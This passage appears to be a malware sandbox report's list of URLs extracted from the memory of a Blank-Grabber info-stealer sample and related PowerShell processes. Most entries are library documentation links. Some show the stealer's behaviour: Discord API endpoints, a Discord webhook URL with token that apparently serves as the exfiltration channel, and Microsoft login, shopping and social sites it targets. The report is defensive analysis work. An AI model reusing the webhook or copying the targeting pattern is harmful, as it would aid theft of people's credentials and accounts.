              Source: powershell.exe, 0000002A.00000002.2291396544.000001C04B53C000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/
              Source: powershell.exe, 0000002A.00000002.2291396544.000001C04B53C000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/Icon
              Source: powershell.exe, 0000002A.00000002.2291396544.000001C04B53C000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/License
              Source: 9g9LZNE4bH.exe, 00000000.00000003.2028286503.000001A5F3611000.00000004.00000020.00020000.00000000.sdmp, 9g9LZNE4bH.exe, 00000000.00000003.2028876650.000001A5F361E000.00000004.00000020.00020000.00000000.sdmp, rar.exe.0.dr | String found in binary or memory: https://d.symcb.com/cps0%
              Source: 9g9LZNE4bH.exe, 00000000.00000003.2028286503.000001A5F3611000.00000004.00000020.00020000.00000000.sdmp, 9g9LZNE4bH.exe, 00000000.00000003.2028876650.000001A5F361E000.00000004.00000020.00020000.00000000.sdmp, rar.exe.0.dr | String found in binary or memory: https://d.symcb.com/rpa0
              Source: 9g9LZNE4bH.exe, 00000000.00000003.2028286503.000001A5F3611000.00000004.00000020.00020000.00000000.sdmp, 9g9LZNE4bH.exe, 00000000.00000003.2028876650.000001A5F361E000.00000004.00000020.00020000.00000000.sdmp, rar.exe.0.dr | String found in binary or memory: https://d.symcb.com/rpa0.
              Source: 9g9LZNE4bH.exe, 00000002.00000003.2042038226.000001F12AE4E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://discord.com/api/v9/users/
              Source: 9g9LZNE4bH.exe, 00000002.00000002.2404350121.000001F12BD40000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: https://discord.com/api/webhooks/1324952562377691148/tMn5PGZkUcHw6GRus7vQh5nn9lZzv19crpx5XMfJnhrwGYX
              Source: 9g9LZNE4bH.exe, 00000002.00000002.2400025008.000001F12AF00000.00000004.00001000.00020000.00000000.sdmp, 9g9LZNE4bH.exe, 00000002.00000003.2042038226.000001F12AE4E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://discordapp.com/api/v9/users/
              Source: 9g9LZNE4bH.exe, 00000002.00000002.2398637648.000001F128D6A000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://docs.python.org/3.11/library/binascii.html#binascii.a2b_base64
              Source: 9g9LZNE4bH.exe, 00000002.00000003.2032440524.000001F12AB01000.00000004.00000020.00020000.00000000.sdmp, 9g9LZNE4bH.exe, 00000002.00000002.2398934018.000001F12A670000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: https://docs.python.org/3/library/importlib.html#importlib.abc.ExecutionLoader.get_filename
              Source: 9g9LZNE4bH.exe, 00000002.00000003.2032440524.000001F12AB01000.00000004.00000020.00020000.00000000.sdmp, 9g9LZNE4bH.exe, 00000002.00000002.2399154194.000001F12A900000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: https://docs.python.org/3/library/importlib.html#importlib.abc.InspectLoader.get_code
              Source: 9g9LZNE4bH.exe, 00000002.00000003.2032440524.000001F12AB01000.00000004.00000020.00020000.00000000.sdmp, 9g9LZNE4bH.exe, 00000002.00000002.2398934018.000001F12A670000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: https://docs.python.org/3/library/importlib.html#importlib.abc.InspectLoader.get_source
              Source: 9g9LZNE4bH.exe, 00000002.00000003.2032440524.000001F12AB01000.00000004.00000020.00020000.00000000.sdmp, 9g9LZNE4bH.exe, 00000002.00000002.2398934018.000001F12A6F8000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: https://docs.python.org/3/library/importlib.html#importlib.abc.InspectLoader.is_package
              Source: 9g9LZNE4bH.exe, 00000002.00000003.2032440524.000001F12AB01000.00000004.00000020.00020000.00000000.sdmp, 9g9LZNE4bH.exe, 00000002.00000002.2398934018.000001F12A6F8000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: https://docs.python.org/3/library/importlib.html#importlib.abc.Loader.create_module
              Source: 9g9LZNE4bH.exe, 00000002.00000003.2032440524.000001F12AB01000.00000004.00000020.00020000.00000000.sdmp, 9g9LZNE4bH.exe, 00000002.00000002.2399154194.000001F12A900000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: https://docs.python.org/3/library/importlib.html#importlib.abc.Loader.exec_module
              Source: 9g9LZNE4bH.exe, 00000002.00000003.2032440524.000001F12AB01000.00000004.00000020.00020000.00000000.sdmp, 9g9LZNE4bH.exe, 00000002.00000002.2398934018.000001F12A670000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: https://docs.python.org/3/library/importlib.html#importlib.abc.MetaPathFinder.invalidate_caches
              Source: 9g9LZNE4bH.exe, 00000002.00000003.2032440524.000001F12AB01000.00000004.00000020.00020000.00000000.sdmp, 9g9LZNE4bH.exe, 00000002.00000002.2399154194.000001F12A900000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: https://docs.python.org/3/library/importlib.html#importlib.abc.PathEntryFinder.find_spec
              Source: 9g9LZNE4bH.exe, 00000002.00000003.2032440524.000001F12AB01000.00000004.00000020.00020000.00000000.sdmp, 9g9LZNE4bH.exe, 00000002.00000002.2398637648.000001F128CF1000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://docs.python.org/3/library/importlib.html#importlib.abc.ResourceLoader.get_data
              Source: 9g9LZNE4bH.exe, 00000002.00000003.2395753264.000001F12B1CA000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/ac/?q=
              Source: 9g9LZNE4bH.exe, 00000002.00000003.2395753264.000001F12B1CA000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/chrome_newtab
              Source: 9g9LZNE4bH.exe, 00000002.00000003.2395753264.000001F12B1CA000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
              Source: 9g9LZNE4bH.exe, 00000002.00000002.2404593794.000001F12BE50000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: https://foss.heptapod.net/pypy/pypy/-/issues/3539
              Source: 9g9LZNE4bH.exe, 00000002.00000002.2400386354.000001F12B208000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://github.com/Blank-c/Blank-Grabber
              Source: 9g9LZNE4bH.exe, 00000002.00000003.2042414743.000001F12AE8D000.00000004.00000020.00020000.00000000.sdmp, 9g9LZNE4bH.exe, 00000002.00000003.2042483409.000001F12AEA2000.00000004.00000020.00020000.00000000.sdmp, 9g9LZNE4bH.exe, 00000002.00000003.2042038226.000001F12AE4E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://github.com/Blank-c/Blank-Grabberi
              Source: 9g9LZNE4bH.exe, 00000002.00000003.2042414743.000001F12AE8D000.00000004.00000020.00020000.00000000.sdmp, 9g9LZNE4bH.exe, 00000002.00000003.2042483409.000001F12AEA2000.00000004.00000020.00020000.00000000.sdmp, 9g9LZNE4bH.exe, 00000002.00000003.2042038226.000001F12AE4E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://github.com/Blank-c/Blank-Grabberr
              Source: 9g9LZNE4bH.exe, 00000002.00000003.2040645327.000001F12BC08000.00000004.00000020.00020000.00000000.sdmp, 9g9LZNE4bH.exe, 00000002.00000003.2041272550.000001F12AE8D000.00000004.00000020.00020000.00000000.sdmp, 9g9LZNE4bH.exe, 00000002.00000003.2041841981.000001F12AE8D000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://github.com/Blank-c/BlankOBF
              Source: powershell.exe, 0000002A.00000002.2242595273.000001C03B5AA000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://github.com/Pester/Pester
              Source: 9g9LZNE4bH.exe, 00000002.00000003.2032440524.000001F12AB01000.00000004.00000020.00020000.00000000.sdmp, 9g9LZNE4bH.exe, 00000002.00000003.2033778965.000001F128D5B000.00000004.00000020.00020000.00000000.sdmp, 9g9LZNE4bH.exe, 00000002.00000002.2398637648.000001F128D27000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://github.com/Unidata/MetPy/blob/a3424de66a44bf3a92b0dcacf4dff82ad7b86712/src/metpy/plots/wx_sy
              Source: 9g9LZNE4bH.exe, 00000002.00000003.2032440524.000001F12AB01000.00000004.00000020.00020000.00000000.sdmp, 9g9LZNE4bH.exe, 00000002.00000002.2398934018.000001F12A6F8000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: https://github.com/python/cpython/blob/3.9/Lib/importlib/_bootstrap_external.py#L679-L688
              Source: 9g9LZNE4bH.exe, 00000002.00000002.2398637648.000001F128D27000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://github.com/python/cpython/blob/839d7893943782ee803536a47f1d4de160314f85/Lib/importlib/abc.py
              Source: 9g9LZNE4bH.exe, 00000002.00000003.2032440524.000001F12AB01000.00000004.00000020.00020000.00000000.sdmp, 9g9LZNE4bH.exe, 00000002.00000003.2033778965.000001F128D5B000.00000004.00000020.00020000.00000000.sdmp, 9g9LZNE4bH.exe, 00000002.00000003.2032706611.000001F128D69000.00000004.00000020.00020000.00000000.sdmp, 9g9LZNE4bH.exe, 00000002.00000002.2398637648.000001F128D27000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://github.com/python/cpython/blob/839d7893943782ee803536a47f1d4de160314f85/Lib/importlib/reader
              Source: 9g9LZNE4bH.exe, 00000002.00000003.2032440524.000001F12AB01000.00000004.00000020.00020000.00000000.sdmp, 9g9LZNE4bH.exe, 00000002.00000003.2033778965.000001F128D5B000.00000004.00000020.00020000.00000000.sdmp, 9g9LZNE4bH.exe, 00000002.00000002.2398637648.000001F128D27000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://github.com/tensorflow/datasets/blob/master/tensorflow_datasets/core/utils/resource_utils.py#
              Source: 9g9LZNE4bH.exe, 00000002.00000002.2399793593.000001F12AEF9000.00000004.00000020.00020000.00000000.sdmp, 9g9LZNE4bH.exe, 00000002.00000003.2143833487.000001F12AEF9000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://github.com/urlli?Z
              Source: 9g9LZNE4bH.exe, 00000002.00000003.2050316287.000001F12AE72000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://github.com/urllib3/urllib3/issues/2168
              Source: 9g9LZNE4bH.exe, 00000002.00000002.2404593794.000001F12BE50000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: https://github.com/urllib3/urllib3/issues/2192#issuecomment-821832963
              Source: 9g9LZNE4bH.exe, 00000002.00000002.2401915686.000001F12B480000.00000004.00000020.00020000.00000000.sdmp, 9g9LZNE4bH.exe, 00000002.00000003.2097358541.000001F12B480000.00000004.00000020.00020000.00000000.sdmp, 9g9LZNE4bH.exe, 00000002.00000003.2085401130.000001F12B471000.00000004.00000020.00020000.00000000.sdmp, 9g9LZNE4bH.exe, 00000002.00000003.2144196309.000001F12B480000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://github.com/urllib3/urllib3/issues/2513#issuecomment-1152559900.
              Source: 9g9LZNE4bH.exe, 00000002.00000002.2404593794.000001F12BE50000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: https://github.com/urllib3/urllib3/issues/2920
              Source: 9g9LZNE4bH.exe, 00000002.00000003.2050316287.000001F12AE72000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://github.com/urllib3/urllib3/issues/3020
              Source: 9g9LZNE4bH.exe, 00000002.00000002.2404593794.000001F12BE50000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: https://github.com/urllib3/urllib3/issues/3290
              Source: powershell.exe, 0000002A.00000002.2242595273.000001C03C25C000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://go.micro
              Source: 9g9LZNE4bH.exe, 00000002.00000002.2399506698.000001F12AD13000.00000004.00000020.00020000.00000000.sdmp, 9g9LZNE4bH.exe, 00000002.00000003.2138960524.000001F12B1CB000.00000004.00000020.00020000.00000000.sdmp, 9g9LZNE4bH.exe, 00000002.00000002.2399251946.000001F12AB14000.00000004.00000020.00020000.00000000.sdmp, 9g9LZNE4bH.exe, 00000002.00000002.2400386354.000001F12B1CD000.00000004.00000020.00020000.00000000.sdmp, 9g9LZNE4bH.exe, 00000002.00000002.2400159195.000001F12B157000.00000004.00000020.00020000.00000000.sdmp, 9g9LZNE4bH.exe, 00000002.00000003.2395753264.000001F12B1CA000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://google.com/
              Source: 9g9LZNE4bH.exe, 00000002.00000002.2399506698.000001F12AD13000.00000004.00000020.00020000.00000000.sdmp, 9g9LZNE4bH.exe, 00000002.00000003.2138960524.000001F12B1CB000.00000004.00000020.00020000.00000000.sdmp, 9g9LZNE4bH.exe, 00000002.00000002.2400386354.000001F12B1CD000.00000004.00000020.00020000.00000000.sdmp, 9g9LZNE4bH.exe, 00000002.00000003.2395753264.000001F12B1CA000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://google.com/mail
              Source: 9g9LZNE4bH.exe, 00000002.00000003.2143833487.000001F12AE9D000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://google.com/mail/
              Source: 9g9LZNE4bH.exe, 00000002.00000002.2400025008.000001F12AF00000.00000004.00001000.00020000.00000000.sdmp, 9g9LZNE4bH.exe, 00000002.00000003.2042038226.000001F12AE4E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://gstatic.com/generate_204
              Source: 9g9LZNE4bH.exe, 00000002.00000002.2399793593.000001F12AE9D000.00000004.00000020.00020000.00000000.sdmp, 9g9LZNE4bH.exe, 00000002.00000003.2143833487.000001F12AE9D000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://html.spec.whatwg.org/multipage/
              Source: 9g9LZNE4bH.exe, 00000002.00000002.2400159195.000001F12B157000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://httpbin.org/
              Source: 9g9LZNE4bH.exe, 00000002.00000002.2404785095.000001F12BF70000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: https://importlib-resources.readthedocs.io/en/latest/using.html#migrating-from-legacy
              Source: 9g9LZNE4bH.exe, 00000002.00000003.2050892507.000001F12AEBD000.00000004.00000020.00020000.00000000.sdmp, 9g9LZNE4bH.exe, 00000002.00000003.2048564293.000001F12AD6C000.00000004.00000020.00020000.00000000.sdmp, 9g9LZNE4bH.exe, 00000002.00000002.2400159195.000001F12B000000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://json.org
              Source: 9g9LZNE4bH.exe, 00000002.00000002.2404950262.000001F12C4B4000.00000004.00001000.00020000.00000000.sdmp, 9g9LZNE4bH.exe, 00000002.00000003.2137521294.000001F12BAA0000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com
              Source: 9g9LZNE4bH.exe, 00000002.00000003.2137521294.000001F12BAA0000.00000004.00000020.00020000.00000000.sdmp, 9g9LZNE4bH.exe, 00000002.00000002.2404950262.000001F12C50C000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: https://login.microsoftonline.com
              Source: powershell.exe, 00000007.00000002.2222117000.000001B991E34000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002A.00000002.2291396544.000001C04B3F9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002A.00000002.2242595273.000001C03CCF1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002A.00000002.2291396544.000001C04B53C000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://nuget.org/nuget.exe
              Source: powershell.exe, 0000002A.00000002.2242595273.000001C03C986000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://oneget.org
              Source: powershell.exe, 0000002A.00000002.2242595273.000001C03C986000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://oneget.orgX
              Source: 9g9LZNE4bH.exe, 00000002.00000002.2404350121.000001F12BD40000.00000004.00001000.00020000.00000000.sdmp, 9g9LZNE4bH.exe, 00000002.00000002.2404593794.000001F12BE50000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: https://packaging.python.org/specifications/entry-points/
              Source: 9g9LZNE4bH.exe, 00000002.00000003.2050316287.000001F12AD71000.00000004.00000020.00020000.00000000.sdmp, 9g9LZNE4bH.exe, 00000002.00000003.2045682909.000001F12AD60000.00000004.00000020.00020000.00000000.sdmp, 9g9LZNE4bH.exe, 00000002.00000003.2039094220.000001F12AD60000.00000004.00000020.00020000.00000000.sdmp, 9g9LZNE4bH.exe, 00000002.00000003.2034507305.000001F12AD60000.00000004.00000020.00020000.00000000.sdmp, 9g9LZNE4bH.exe, 00000002.00000003.2039896185.000001F12AD60000.00000004.00000020.00020000.00000000.sdmp, 9g9LZNE4bH.exe, 00000002.00000002.2399381962.000001F12AC00000.00000004.00001000.00020000.00000000.sdmp, 9g9LZNE4bH.exe, 00000002.00000003.2048564293.000001F12AD6C000.00000004.00000020.00020000.00000000.sdmp, base_library.zip.0.dr | String found in binary or memory: https://peps.python.org/pep-0205/
              Source: 9g9LZNE4bH.exe, 00000002.00000002.2407700677.00007FF8A8CCC000.00000040.00000001.01000000.00000004.sdmp | String found in binary or memory: https://peps.python.org/pep-0263/
              Source: 9g9LZNE4bH.exe, 00000002.00000002.2400386354.000001F12B208000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://raw.githubusercontent.com/Blank-c/Blank-Grabber/main/.github/workflows/image.png
              Source: 9g9LZNE4bH.exe, 00000002.00000002.2399154194.000001F12A900000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: https://raw.githubusercontent.com/Blank-c/Blank-Grabber/main/.github/workflows/image.pngp
              Source: 9g9LZNE4bH.exe, 00000002.00000003.2042038226.000001F12AE4E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://raw.githubusercontent.com/Blank-c/Blank-Grabber/main/.github/workflows/image.pngz
              Source: 9g9LZNE4bH.exe, 00000000.00000003.2028286503.000001A5F3611000.00000004.00000020.00020000.00000000.sdmp, rar.exe.0.dr | String found in binary or memory: https://sectigo.com/CPS0
              Source: 9g9LZNE4bH.exe, 00000002.00000003.2097358541.000001F12B4D8000.00000004.00000020.00020000.00000000.sdmp, 9g9LZNE4bH.exe, 00000002.00000003.2110914947.000001F12B36D000.00000004.00000020.00020000.00000000.sdmp, 9g9LZNE4bH.exe, 00000002.00000003.2125868086.000001F12B4D8000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://support.mozilla.org
              Source: 9g9LZNE4bH.exe, 00000002.00000003.2070355548.000001F12B29F000.00000004.00000020.00020000.00000000.sdmp, 9g9LZNE4bH.exe, 00000002.00000003.2112269853.000001F12B31C000.00000004.00000020.00020000.00000000.sdmp, 9g9LZNE4bH.exe, 00000002.00000003.2111259470.000001F12B23C000.00000004.00000020.00020000.00000000.sdmp, 9g9LZNE4bH.exe, 00000002.00000003.2093044186.000001F12B23C000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
              Source: 9g9LZNE4bH.exe, 00000002.00000002.2401507128.000001F12B317000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://support.mozilla.org/p
              Source: 9g9LZNE4bH.exe, 00000002.00000003.2070355548.000001F12B29F000.00000004.00000020.00020000.00000000.sdmp, 9g9LZNE4bH.exe, 00000002.00000002.2399251946.000001F12AB14000.00000004.00000020.00020000.00000000.sdmp, 9g9LZNE4bH.exe, 00000002.00000003.2112269853.000001F12B31C000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://support.mozilla.org/products/firefox
              Source: 9g9LZNE4bH.exe, 00000002.00000002.2399506698.000001F12AD13000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://tools.ietf.org/html/rfc2388#section-4.4
              Source: 9g9LZNE4bH.exe, 00000002.00000002.2399251946.000001F12AB14000.00000004.00000020.00020000.00000000.sdmp, 9g9LZNE4bH.exe, 00000002.00000002.2404950262.000001F12C46C000.00000004.00001000.00020000.00000000.sdmp, 9g9LZNE4bH.exe, 00000002.00000002.2400159195.000001F12B157000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://twitter.com/
              Source: 9g9LZNE4bH.exe, 00000002.00000002.2399793593.000001F12AE9D000.00000004.00000020.00020000.00000000.sdmp, 9g9LZNE4bH.exe, 00000002.00000003.2143833487.000001F12AE9D000.00000004.00000020.00020000.00000000.sdmp, 9g9LZNE4bH.exe, 00000002.00000002.2404593794.000001F12BE50000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: https://urllib3.readthedocs.io/en/latest/advanced-usage.html#https-proxy-error-http-proxy
              Source: 9g9LZNE4bH.exe, 00000002.00000002.2404593794.000001F12BE50000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: https://urllib3.readthedocs.io/en/latest/advanced-usage.html#tls-warnings
              Source: 9g9LZNE4bH.exe, 00000002.00000002.2404950262.000001F12C4A4000.00000004.00001000.00020000.00000000.sdmp, 9g9LZNE4bH.exe, 00000002.00000002.2404950262.000001F12C46C000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: https://weibo.com/
              Source: 9g9LZNE4bH.exe, 00000002.00000002.2404950262.000001F12C46C000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: https://www.aliexpress.com/
              Source: 9g9LZNE4bH.exe, 00000002.00000002.2404950262.000001F12C46C000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: https://www.amazon.ca/
              Source: 9g9LZNE4bH.exe, 00000002.00000002.2404950262.000001F12C46C000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: https://www.amazon.co.uk/
              Source: 9g9LZNE4bH.exe, 00000002.00000002.2404950262.000001F12C46C000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: https://www.amazon.com/
              Source: 9g9LZNE4bH.exe, 00000002.00000002.2404950262.000001F12C46C000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: https://www.amazon.de/
              Source: 9g9LZNE4bH.exe, 00000002.00000002.2404950262.000001F12C46C000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: https://www.amazon.fr/
              Source: 9g9LZNE4bH.exe, 00000002.00000002.2404593794.000001F12BE50000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: https://www.avito.ru/
              Source: 9g9LZNE4bH.exe, 00000002.00000002.2404950262.000001F12C46C000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: https://www.baidu.com/
              Source: 9g9LZNE4bH.exe, 00000002.00000002.2404950262.000001F12C46C000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: https://www.bbc.co.uk/
              Source: 9g9LZNE4bH.exe, 00000002.00000002.2404950262.000001F12C46C000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: https://www.ctrip.com/
              Source: 9g9LZNE4bH.exe, 00000002.00000002.2404950262.000001F12C46C000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: https://www.ebay.co.uk/
              Source: 9g9LZNE4bH.exe, 00000002.00000002.2404950262.000001F12C46C000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: https://www.ebay.de/
              Source: 9g9LZNE4bH.exe, 00000002.00000003.2395753264.000001F12B1CA000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.ecosia.org/newtab/
              Source: 9g9LZNE4bH.exe, 00000002.00000002.2404950262.000001F12C46C000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: https://www.google.com/
              Source: 9g9LZNE4bH.exe, 00000002.00000002.2404950262.000001F12C46C000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: https://www.google.com/complete/
              Source: 9g9LZNE4bH.exe, 00000002.00000003.2395753264.000001F12B1CA000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
              Source: 9g9LZNE4bH.exe, 00000002.00000002.2404950262.000001F12C46C000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: https://www.ifeng.com/
              Source: 9g9LZNE4bH.exe, 00000002.00000002.2404950262.000001F12C46C000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: https://www.iqiyi.com/
              Source: 9g9LZNE4bH.exe, 00000002.00000002.2404950262.000001F12C46C000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: https://www.leboncoin.fr/
              Source: 9g9LZNE4bH.exe, 00000002.00000003.2097358541.000001F12B4D8000.00000004.00000020.00020000.00000000.sdmp, 9g9LZNE4bH.exe, 00000002.00000003.2110914947.000001F12B36D000.00000004.00000020.00020000.00000000.sdmp, 9g9LZNE4bH.exe, 00000002.00000003.2125868086.000001F12B4D8000.00000004.00000020.00020000.00000000.sdmp, 9g9LZNE4bH.exe, 00000002.00000002.2404950262.000001F12C458000.00000004.00001000.00020000.00000000.sdmp, 9g9LZNE4bH.exe, 00000002.00000002.2404950262.000001F12C4E0000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: https://www.mozilla.org
              Source: 9g9LZNE4bH.exe, 00000002.00000003.2070355548.000001F12B29F000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.mozilla.org/about/
              Source: 9g9LZNE4bH.exe, 00000002.00000003.2070355548.000001F12B29F000.00000004.00000020.00020000.00000000.sdmp, 9g9LZNE4bH.exe, 00000002.00000003.2112269853.000001F12B31C000.00000004.00000020.00020000.00000000.sdmp, 9g9LZNE4bH.exe, 00000002.00000003.2111259470.000001F12B23C000.00000004.00000020.00020000.00000000.sdmp, 9g9LZNE4bH.exe, 00000002.00000003.2093044186.000001F12B23C000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.mozilla.org/contribute/
              Source: 9g9LZNE4bH.exe, 00000002.00000003.2070355548.000001F12B29F000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/
              Source: 9g9LZNE4bH.exe, 00000002.00000003.2110914947.000001F12B37C000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
              Source: 9g9LZNE4bH.exe, 00000002.00000003.2070355548.000001F12B29F000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
              Source: 9g9LZNE4bH.exe, 00000002.00000003.2145115778.000001F12B37E000.00000004.00000020.00020000.00000000.sdmp, 9g9LZNE4bH.exe, 00000002.00000003.2068920693.000001F12B37F000.00000004.00000020.00020000.00000000.sdmp, 9g9LZNE4bH.exe, 00000002.00000003.2085069961.000001F12B37F000.00000004.00000020.00020000.00000000.sdmp, 9g9LZNE4bH.exe, 00000002.00000003.2110914947.000001F12B37E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.mozilla.org/media/img/favicons/mozilla/favicon-196x196.2af054fea211.png
              Source: 9g9LZNE4bH.exe, 00000002.00000003.2085069961.000001F12B37F000.00000004.00000020.00020000.00000000.sdmp, 9g9LZNE4bH.exe, 00000002.00000003.2110914947.000001F12B37E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.mozilla.org/media/img/favicons/mozilla/favicon.d25d81d39065.icox
              Source: 9g9LZNE4bH.exe, 00000002.00000002.2404950262.000001F12C4FC000.00000004.00001000.00020000.00000000.sdmp, 9g9LZNE4bH.exe, 00000002.00000003.2137521294.000001F12BAA0000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.msn.com
              Source: 9g9LZNE4bH.exe, 00000002.00000002.2404950262.000001F12C4A4000.00000004.00001000.00020000.00000000.sdmp, 9g9LZNE4bH.exe, 00000002.00000002.2404950262.000001F12C46C000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: https://www.olx.pl/
              Source: 9g9LZNE4bH.exe, 00000000.00000003.2027522576.000001A5F3611000.00000004.00000020.00020000.00000000.sdmp, 9g9LZNE4bH.exe, 00000002.00000002.2408750040.00007FF8A9393000.00000004.00000001.01000000.00000010.sdmp, 9g9LZNE4bH.exe, 00000002.00000002.2407250158.00007FF8A87B4000.00000004.00000001.01000000.0000000F.sdmp, libssl-1_1.dll.0.dr, libcrypto-1_1.dll.0.dr | String found in binary or memory: https://www.openssl.org/H
              Source: 9g9LZNE4bH.exe, 00000002.00000002.2398934018.000001F12A670000.00000004.00001000.00020000.00000000.sdmp, base_library.zip.0.dr | String found in binary or memory: https://www.python.org/download/releases/2.3/mro/.
              Source: 9g9LZNE4bH.exe, 9g9LZNE4bH.exe, 00000002.00000002.2407700677.00007FF8A8D69000.00000040.00000001.01000000.00000004.sdmp | String found in binary or memory: https://www.python.org/psf/license/
              Source: 9g9LZNE4bH.exe, 00000002.00000002.2404950262.000001F12C46C000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: https://www.reddit.com/
              Source: 9g9LZNE4bH.exe, 00000002.00000002.2399251946.000001F12AB14000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.rfc-editor.org/rfc/rfc8259#section-8.1
              Source: 9g9LZNE4bH.exe, 00000002.00000002.2404593794.000001F12BE50000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: https://www.wykop.pl/
              Source: 9g9LZNE4bH.exe, 00000002.00000002.2404950262.000001F12C46C000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: https://www.youtube.com/
              Source: 9g9LZNE4bH.exe, 00000002.00000002.2404950262.000001F12C4A4000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: https://www.zhihu.com/
